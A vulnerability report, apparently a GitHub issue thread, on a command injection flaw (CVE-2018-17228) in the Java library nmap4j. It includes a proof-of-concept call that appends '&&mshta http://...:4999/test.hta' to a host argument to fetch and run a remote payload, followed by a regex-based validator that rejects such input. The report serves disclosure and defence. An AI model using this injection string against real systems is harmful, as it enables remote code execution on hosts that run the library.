command execution vulnerability #9
Comments

CVE-2018-17228 was assigned to this issue.

A possible fix is to limit includeHosts to only accept one of the following options:
- Single IP - 192.168.1.1 -> easy regex

I would still recommend input validation when exposing this library publicly (in an API for example).

Validation added in 06b58aa
```java
import org.nmap4j.core.Nmap4j;

// Path to the Nmap installation; the backslash must be escaped in a Java string literal
String path = "D:\\Nmap";
String op = "-T4 -p4999";
Nmap4j nmap4j = new Nmap4j(path);
// includeHosts() is meant to receive a host list; the "&&..." suffix is passed through to the shell unchanged
nmap4j.includeHosts("118.24.74.232&&mshta http://118.24.74.232:4999/test.hta");
nmap4j.addFlags(op);
nmap4j.execute();
```
Here, nmap4j.includeHosts() was originally intended to receive hosts. When we append custom commands after the host, they get executed.
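The mitigation suggested in the comments above (accept only a single IP via a regex, and validate input before it reaches the library) as an added example. This is not nmap4j's own code and does not reproduce commit 06b58aa; the `HostValidator` class and its method names are assumptions, and the sample inputs are constructed for the demonstration.

```java
import java.util.regex.Pattern;

// Added example (not nmap4j's code): whitelist validation of a host argument
// before it is ever handed to includeHosts(). Accepts one dotted-quad IPv4
// address or one plain DNS hostname; anything else, including shell
// metacharacters such as "&&", ";" or whitespace, is rejected.
public final class HostValidator {
    // Exactly four octets, each 0-255.
    private static final Pattern IPV4 = Pattern.compile(
        "^((25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)\\.){3}(25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)$");
    // RFC 1123 style labels: letters, digits, hyphens; max 63 chars per label, 253 total.
    private static final Pattern HOSTNAME = Pattern.compile(
        "^(?=.{1,253}$)([a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\\.)*"
        + "[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$");

    public static boolean isValidHost(String host) {
        if (host == null) return false;
        String h = host.trim();
        // matches() anchors on the whole string, so a trailing "&&cmd" can never slip through
        return IPV4.matcher(h).matches() || HOSTNAME.matcher(h).matches();
    }

    // Fail closed: throw rather than pass unvalidated input on to the scanner.
    public static String requireValidHost(String host) {
        if (!isValidHost(host)) {
            throw new IllegalArgumentException("refusing host argument: " + host);
        }
        return host.trim();
    }

    public static void main(String[] args) {
        // Constructed samples; the third one is the payload shown in this issue.
        String[] samples = {
            "192.168.1.1",
            "scanme.example.org",
            "118.24.74.232&&mshta http://118.24.74.232:4999/test.hta",
            "10.0.0.1; id",
            "256.1.1.1"
        };
        for (String s : samples) {
            System.out.println((isValidHost(s) ? "ACCEPT " : "REJECT ") + s);
        }
        // Intended call site (assumed wrapper usage): 
        //   nmap4j.includeHosts(HostValidator.requireValidHost(userSuppliedHost));
    }
}
```

Only the first two samples are accepted; the remaining three, including the issue's payload, are rejected because the anchored patterns leave no room for a second command.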